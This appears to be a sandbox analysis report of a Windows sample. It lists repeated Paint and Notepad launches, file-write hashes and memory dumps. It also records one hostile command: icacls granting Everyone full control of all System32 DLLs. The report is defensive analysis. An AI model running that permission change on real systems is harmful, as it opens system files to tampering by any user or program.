"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

Network

N/A

Files

memory/1020-0-0x00007FF71A460000-0x00007FF71A600000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

C:\Windows\Debug\WIA\wiatrace.log

MD5 7cd1509dbe8e73417ff92bfd04320e3c
SHA1 4fca74c3d6377e8ffd14ab34b35082efb1209ef9
SHA256 8575cd2eaebea2f499228b1aba714bc5fa7427cd036f6bcf074dbb9fc9d085ad
SHA512 852cd692e36e2853c02c707b8769a89ae3d83ba60e039f0fff39558386d9e2cc5fa579bfeda850a7a8a01ba4c5548f646521b11ff988b3e3e62c8604e099bdb7

C:\Windows\Debug\WIA\wiatrace.log

MD5 dab78d7a19962adb8452777d6fcad53a
SHA1 04313c5d439e17082680973434a1f075775c9d0b
SHA256 b169f6c3fa793c0892bad76f4a51eebbba6013125228e10443d27686bac47596
SHA512 88fde5cace8f93e47603f2cae0ce64b81887903ee4b3e045f210f9385d30855bd613b7ed922ecefeb620b3e98aee016e5bf60e6ef0049a67beb71f798e5df85b

C:\Windows\Debug\WIA\wiatrace.log

MD5 9d9c83a6efdec67df36290adf290b102
SHA1 e36ee7fd06d179b67d4c9f0a2372ec0021ca8281
SHA256 f43495a340ccde897b5152694abb450b1bdbf788f0fc4debb26e577613a21954
SHA512 8c2d413fa7c504c5dc013d9f64d8371f47222efb5764fa8bb10056376e6e085c4bfa72c51c34fbaaab5f94023ed6478c923391fd844cfc0177f7de2917972ec6

C:\Windows\Debug\WIA\wiatrace.log

MD5 999a2863ad8be72c71487f23b3d4217b
SHA1 8bcff1524f8d296657977796f09b05f3a3a5fdeb
SHA256 1917271a22f1af2d53f968befadb287cbcca0ec655dc98c9457c4197bdf00b3e
SHA512 d620915058f0eb6d23ebe62a469c40aaf59d5d7a34c0cd397b1b2ee042e3677dbab9adfa9c4636ee33bb2932507ab0cdcc61469a24e318f621fb7bade30e1d92

C:\Windows\Debug\WIA\wiatrace.log

MD5 2e9ecc50ce5c9850269897af86b4a9cd
SHA1 b51c7a91c546b7dab2fe2d9318e89a92846b5433
SHA256 0ab7d448e20f2dad83492479e20f6638575f8247cc0e6dfcac1caca17e3f3542
SHA512 0e1dcdf6268c976558084bee3fccee2d7ea2aa9ca867d3df71d7ce656f2160c516ed9cb7fb25ce94aef567aead63d34df573c648cff3086130a23fd24057411f

C:\Windows\Debug\WIA\wiatrace.log

MD5 5502784e47cdbb694f3bad5c5b011d13
SHA1 7d5a6d18e787a4dfff7bb675a2ed35d888a775e4
SHA256 83ab6a81b3958cc54f1252b51d01996eef7db34d489dfe0c49ce59c0f41370d9
SHA512 e09dce476882fb75fddabdd59df4670ce217cd0979633a71d6c9dfbf6dfbf28b637af20c0af761270629556b92e03cc2e376e905fae5d8a7cf4b38fe9a9b8168

C:\Windows\Debug\WIA\wiatrace.log

MD5 72d1503bef83861063087ccf1e49361a
SHA1 8a6050f8850160e1d067c5b9c48253bca2934794
SHA256 70925ceef4e66e893002da3db8efe2d9812ba16d8c0285248ef45c9c717ddd3d
SHA512 859711de8e52aae2b78f47ab9ce73f0c533294c16579ce8b59967da0dccffccb6b4351f35cf2121975448bcabc51c2f36a5e8f223fcf51a3ed50383a19fe6ce6

C:\Windows\Debug\WIA\wiatrace.log

MD5 1c4cb78509612b2e582c9543d74d256a
SHA1 6a8bc741de2b9ff7e7d37a3619b7a3505c12513c
SHA256 376394fe7fade6c5ebaed342bc23885cad07f87c7265daccfc62fd9b1d44a284
SHA512 f6c706663361249a2941e5417f446961686db6651e7131ceedf131d4d694394a00a41c3b53717ea60656c4513512f62f39539922a3c436f61f8b1c60124aa59a

C:\Windows\Debug\WIA\wiatrace.log

MD5 f4fe17aa606cbae50c7f38694eed99e1
SHA1 2845a4784b2b084bfbd44aff71c14d8f0162d846
SHA256 97fc565c5a4ce60e6c39aa5ebf2e903a0c978411afa7c17d3a0706249032cb12
SHA512 ae5c44b2d128b02abe87adacffb65bde7706cc610feccae4eb80d24ead8f0e08a82a875a0bd48b689b411393c581bbc3622108e262cb530d9a26c0dcb85b70db

C:\Windows\Debug\WIA\wiatrace.log

MD5 e5c686d57c685dd84a25318138474169
SHA1 ebff7c1b1d5c8a221001a25c751df8c4de54be66
SHA256 9902d9a8e83d909f86d7bb983410e5ecd17132f0c151d4cf2234d284a71cb3af
SHA512 56f8069fbf5e93d3439bdebd68cc9d2d39ae27c354595fcbe1f800199c8a1d50cc2857687466f737bafb71b02257edca24ddfc8b03977ee4d3b216c0096e842d

C:\Windows\Debug\WIA\wiatrace.log

MD5 575b9dbf7cee915b4864ac9288f7120f
SHA1 4325bde7b96e0d66a1be96f401898d4aa921aa4f
SHA256 7f5404e5017dad34b7c4374fbb091891d9e166194db7eb358fdc06890813981f
SHA512 9eccb4c7cf40a4a09f59ae90abc6624b87ab35163f55d4a36e890b16c00666d13bb8e71926023fc8bfd5ef4e93d295c9e2c91c99e42398c188e1c2cbd9624bc7

C:\Windows\Debug\WIA\wiatrace.log

MD5 ebbff6e5e05709a391c879f0a011dd57
SHA1 01c7cad7b4d4167a67a814246d01a843636ecd94
SHA256 73308be94af8ee1efc1e8a9b68c2e77d524a0c95ec15468d87ac798def4ad6c7
SHA512 ee315debcf9732018fcdb8d314f0d77e756b6ac7f443b4bae6da97a126dee629fba7b778ce54b0648ece682f795082b7e3d9a48e54be7d96ee5e0d10232f53d3

C:\Windows\Debug\WIA\wiatrace.log

MD5 b9dfea89eff03bb38c17e19f09f26be0
SHA1 420a7eca4d966b44fb3e4e8d9f398ef48f56fe08
SHA256 703daf6f3c14b172008dd3000e313d2214536ca2ea4a963e919cb1ada6035ac0
SHA512 b55adc5bc231ca22b5b4a6ccfe491eb25723a99da91082333d442476efd82841eaf8a68bfb2baff2329c6185c0b7cc29865bc00076554e2fea41c5c1b70e0bd9

C:\Windows\Debug\WIA\wiatrace.log

MD5 77142b36398fe8c6511e3e783796dac6
SHA1 00df420eeca88963975238aa50dc758489189135
SHA256 ff979af182945830ac18a0f5532ed196f166a133e9db33fa9074a5f2522c0e9e
SHA512 13e7e7c7aa7056c67c31d085ff034ead031157b4bfec26ba9234c3ff3607ac1e07d7e3e8f52c5904b8d3dcf86623b0a246b2ff2e425ff7b0d0aee27711c13ce7

C:\Windows\Debug\WIA\wiatrace.log

MD5 a95be14266a9eeb8424502f77c2a83cc
SHA1 c5bcdd9389d21d46431e84167e3104c1cdbe85ca
SHA256 e0de7730f41d11a68204989569a130932ffaaf60500451cda73fea48cc7afff6
SHA512 505a0bd3633851998cc163feee6d188f93bf23fd325e8c510f6de55220c01ad1726a5c015d848816154069cb09dab35bf57499046c125a1d81c415fd2191c18e

C:\Windows\Debug\WIA\wiatrace.log

MD5 33285a2426c5fa6a6c346133debbb68d
SHA1 690b0ae64c77b0d1795326441161ae9f489e8a68
SHA256 3519f96b5953644cd0c5a34a6dd8c315cf359bbb99f336b2d03f8ca329d39f34
SHA512 b757f6f990663dac35b9a54e8fd655ba1f4417a999e49969e3922369c02a0c2e39bb6b0657bae241b518333f3631f1536bcbd6f2ebca8538739ec99a599c22c6

C:\Windows\Debug\WIA\wiatrace.log

MD5 c4431ced55364dc8cb78524f77ad6e73
SHA1 d407143cf0cd58e4d1e234059cce73ac5bb40176
SHA256 b4bbdf0a95837cb22b0c57c1d09258733182462a956d4511032c4aa97705072f
SHA512 245e79b315c73cafbaf415b7a55fefa7be126ae488bc1e375ad2d0a7f4b7afcbac4643cc1b533b447d5e54f5975194177e7d7807198acdb1e04bba85d280796b

C:\Windows\Debug\WIA\wiatrace.log

MD5 65538cb755e08d89bda7ebc61b836c80
SHA1 557ecb791e44bff9d5e4a404180dad5cc5e288f8
SHA256 18cb330b04255e8e6ab582d688d22013165cf03ca9e8d943e1a980ce486283e3
SHA512 8b158d10c765e45c8d14af35cc1e63ec3f2da6e15eb022a58717347d48df0f8efecf824361d9d4f874658c74c12e2125c0f4b434496597aa54797f82d1bf32b5

C:\Windows\Debug\WIA\wiatrace.log

MD5 0f0a500831e49bfe548360f9a7537654
SHA1 4000a1ed4419e814176c9a8eb56cf75bc7c4c01c
SHA256 5b70dbf3a15266a01bbfa86db62c80d9aa1a4991650a8719a8f95dfdfa758c10
SHA512 271dfb301d9f3808e6b0fccadf4fda0803cc084f056735849a76361dee4259ba4873a2f8890c92a3caeada0b68f83694ce13642ee3d99cfc6be2a9c12060b9a1

C:\Windows\Debug\WIA\wiatrace.log

MD5 8938a93f6a7dd3eeaee47675d96d0757
SHA1 ad00c5af819f1b85ae31a6a2b95dabf843fd64c4
SHA256 3541ec612684362b0a473196bf4b6b9abe1798cf71171e29f4b12e1bfbd221f2
SHA512 1f7e4d15ec9dbe54a6b6fb2df8afa4733cc9673330bf39b36404194d175bdcfe65f44dec5de7c9380e7ce9c1384f9b233eec916bf90936c1be109238665a206b

C:\Windows\Debug\WIA\wiatrace.log

MD5 63b315858c5f5d5c70e90b15daf849c0
SHA1 9a19acb035d9e0603cbc420e171d5f18e0f3db2f
SHA256 e26a107f504efd6494fff804468ffb936acfdcd08447bf756aa10ec5a16a4be7
SHA512 3212c542070eb767581607e12ea038000b7eb5bbe6c310eb3b5d4b7189d317e690a51990688895a8c59748ad0da25e8f5d5117b02631aa76e891766ea5696315

C:\Windows\Debug\WIA\wiatrace.log

MD5 d5d81ef1bb3f19be5b474382c281fd6e
SHA1 2e88aafef64cef7923955bb6c242eeac84286e60
SHA256 fd080d31eaf9e9a2e1eb4a013854314a22148cead250bc43456a0ff513cea0c1
SHA512 caae3d22a282f90556daf7939c16b129cc311a3f36262a41d2233a70a89b5e439eed7608c6ac815abcc870dd82927102c5c0e0134ce0e37df0ce21ed76f55c08

C:\Windows\Debug\WIA\wiatrace.log

MD5 1fbedea4f40e27dd2b255d2b912efe97
SHA1 c04871745df5988944af03f241a55a299cb5f72f
SHA256 c05e1c105b0cca22707639c782573dd3da99b37a1d56c0c347ae5d3dc824a85b
SHA512 ed857f6d470461ec3d474732de9286dd27998f9fa79d20818f27aa67607ca172143260cbda090d9a2e6602bc523c618bc9598608b3fabb68d32f962f963495ed

C:\Windows\Debug\WIA\wiatrace.log

MD5 469694005e1c27adee010ac0a30448e1
SHA1 0bc892f3c1ed4a98d81b16d25e8beb3778172c3b
SHA256 e5265d435904c07546b0068e2b705345ca0755c4654c904068002862516f380b
SHA512 1765b8911904ec33bdf1c4992ea4371dfb676f594a2d5eb53645525fc89263c7cadad4d8e04794596570dcb8778ca6b1d3da4ce333b938919ff75e3dc8bee85d

C:\Windows\Debug\WIA\wiatrace.log

MD5 97e2d7078a764d717cbbbdb309676d5a
SHA1 a9d8ba5353b54acbbaa6a02924af09232e6c0d0e
SHA256 ad70f218efe34f0613c8f4b47cccb8fcabd2e9d859d959ef34032f6a1d1ebe64
SHA512 52c3b430a9d91065e0e9a398c949c1eece029eec1684c21b6f3f74b398d1956ce910f7f10dd33c1379ded81475683974af4deb4e4c892a8af67f993e110afa5b

C:\Windows\Debug\WIA\wiatrace.log

MD5 d169536691879988318c9caf9353c13a
SHA1 419a2911ea61a8d81e06ad929637c96e9f06900e
SHA256 5d4e4edd634d57d6754ae61515b56113dd992c35342af9cd1973dc335021d8b9
SHA512 30f2f35e663034b6650a5a94a59fb06353ba874c12a2415f42a7f27e3d6a97598074ca23f89e0ba09c81d28430994af24d4a7b936547c643aab435dd947a62b2

C:\Windows\Debug\WIA\wiatrace.log

MD5 232f7e744e1ce036fb87c5bf0a91d900
SHA1 7daf63864c69adf2ccd8fa98463fa6c87e4829f3
SHA256 4781e99b637500085a088a19e362766cbba746c3d4918318de5a386f0e104bb3
SHA512 08c69de34fa809fed0ebeccbf8a76f015e34b45f7df60f0379d24d2f15302ae279b53332209247e4fc306fae3867cffe5352b7f4b7e42430c634922d6057eb82

C:\Windows\Debug\WIA\wiatrace.log

MD5 8846e3a298073d7f1591cd9cc4ec8776
SHA1 f1e7f302e3e03c730c7309944c9be48dc4e9d793
SHA256 1b961441008f4f3ed7faf9b5791ef67441920d33795eb4464099c8194dcd50cb
SHA512 87ead00552bd919d6a746bfb41db358cda448bab3e54af844839903ea8586fbaa3aa9b5645e4f97d95569c13a8c00a8decba9c530eb2df839fa600aa54f31b66

C:\Windows\Debug\WIA\wiatrace.log

MD5 af74f331590dd819b25aa390eef30a09
SHA1 6f9835cada01e70771fc538dcf8f4d1dcbeb4435
SHA256 26886e1e165f9de8f29a376b799ee5849bddb39a1c8aa8b0b598f24e1c93ad65
SHA512 e57486b32def7c57e3fba1c48d99eb24d3a8e12292ac9dedbbf743592a051f7ec36a168cce6cb522bcda1ddc632c703400e8d257e79adbed9aa004fa101f017a

C:\Windows\Debug\WIA\wiatrace.log

MD5 21c5cd44ce77a31b7e412f9e913d0256
SHA1 9a8ecebf2f1b9e8569b233097a040e8612b05240
SHA256 a8f9e4a1bb81929156df0af46f50c244f237e60925c216321296c7855e48e7ce
SHA512 3537b7973232a06dce4f44ccb42350959e5221cc3c5f05ca87d8dc27897f8cf08a71e4ddfa27c02f0a4d4795e50ae8b0dffa7fe37d717a4fe5b864f6c503956e

C:\Windows\Debug\WIA\wiatrace.log

MD5 a7eda84109d17bab0f98a34124d2bec4
SHA1 ef5a2db4451401259a8d26137a42562e40da8073
SHA256 7c990e23758e81391881cb2d4eec307dffe45a1236e673e9d699ab613d84ddd6
SHA512 bd2fc76e99747a2b42276e1f54ba12b65ca2f8960c45f2dc1f7c1c31cb5f30ff3ecce7848841c388467b95295521081fe99ec56a6a2157be83d3ca1d54e75272

memory/1020-35-0x00007FF71A460000-0x00007FF71A600000-memory.dmp